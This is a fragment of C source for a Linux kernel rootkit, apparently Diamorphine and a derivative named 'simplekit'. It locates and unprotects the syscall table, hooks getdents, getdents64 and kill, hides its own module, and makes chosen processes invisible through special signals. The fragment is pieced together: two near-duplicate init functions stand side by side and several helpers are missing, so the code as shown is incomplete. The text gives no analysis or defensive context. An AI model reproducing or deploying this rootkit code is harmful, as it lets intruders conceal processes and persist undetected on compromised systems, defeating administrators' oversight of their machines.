static int __init
diamorphine_init(void)
{
unsigned int level;
sys_call_table = get_syscall_table_bf();
if (!sys_call_table)
return -1;
pte = lookup_address((unsigned long)sys_call_table, &level);
if (!pte)
return -1;
module_hide();
tidy();
orig_getdents = (orig_getdents_t)sys_call_table[__NR_getdents];
orig_getdents64 = (orig_getdents64_t)sys_call_table[__NR_getdents64];
orig_kill = (orig_kill_t)sys_call_table[__NR_kill];
unprotect_memory();
sys_call_table[__NR_getdents] = (unsigned long)hacked_getdents;
sys_call_table[__NR_getdents64] = (unsigned long)hacked_getdents64;
sys_call_table[__NR_kill] = (unsigned long)hacked_kill;
protect_memory();
return 0;
}
asmlinkage int
hacked_kill(pid_t pid, int sig)
{
struct task_struct *task;
switch (sig) {
case SIGINVIS:
if ((task = find_task(pid)) == NULL)
return -ESRCH;
task->flags ^= PF_INVISIBLE;
break;
case SIGMODINVIS:
if (module_hidden) module_show();
else module_hide();
break;
default:
return orig_kill(pid, sig);
}
return 0;
}
static int param_kmod_hide(const char *val, struct kernel_param *kp)
{
int ret;
ret = param_set_bool(val, kp);
if (ret)
{
#ifdef DEBUG
printk(KERN_ALERT "%s error: could not parse LKM hideme parameters\n",
MODULE_NAME);
#endif
return ret;
}
if (hideme)
module_hide();
else
module_show();
return 0;
}
// 커널 모듈을 로드할 때 수행
static int __init
simplekit_init(void)
{
sys_call_table = get_syscall_table_bf();
if (!sys_call_table)
return -1;
cr0 = read_cr0();
module_hide();
tidy();
orig_getdents = (orig_getdents_t)sys_call_table[__NR_getdents];
orig_getdents64 = (orig_getdents64_t)sys_call_table[__NR_getdents64];
orig_kill = (orig_kill_t)sys_call_table[__NR_kill];
unprotect_memory();
sys_call_table[__NR_getdents] = (unsigned long)hacked_getdents;
sys_call_table[__NR_getdents64] = (unsigned long)hacked_getdents64;
sys_call_table[__NR_kill] = (unsigned long)hacked_kill;
protect_memory();
return 0;
}
